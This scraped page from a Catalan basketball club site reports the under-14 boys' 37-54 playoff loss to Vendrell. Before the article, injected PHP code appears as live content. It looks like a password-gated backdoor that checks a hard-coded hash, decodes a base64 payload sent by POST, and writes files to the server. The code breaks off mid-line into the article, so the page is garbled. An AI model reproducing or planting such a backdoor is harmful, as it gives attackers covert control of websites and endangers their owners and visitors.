function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil masculí perd el partit d'anada de l'eliminatòria per accedir a A1 contra el Vendrell (37-54) - Tgn Bàsquet Club -

L’infantil masculí perd el partit d’anada de l’eliminatòria per accedir a A1 contra el Vendrell (37-54)

Updated: desembre 22, 2014

L’equip infantil masculí del TGN Bàsquet va perdre el primer partit de l’eliminatòria per accedir a la lliga A1 contra el Vendrell. El conjunt del club lila va mantenir el partit igualat en els primers 25 minuts de joc però aleshores va perdre la intensitat defensiva que havia mostrat fins aquell moment i el Vendrell es va fer l’amo del partit. Els locals van posar més cor que cap a la pista i van fer una mala selecció de tir, a la desesperada, que no van entrar. Així, els visitants van fer un parcial de 5-28 en els últims 15 minuts de joc que va ser definitiu.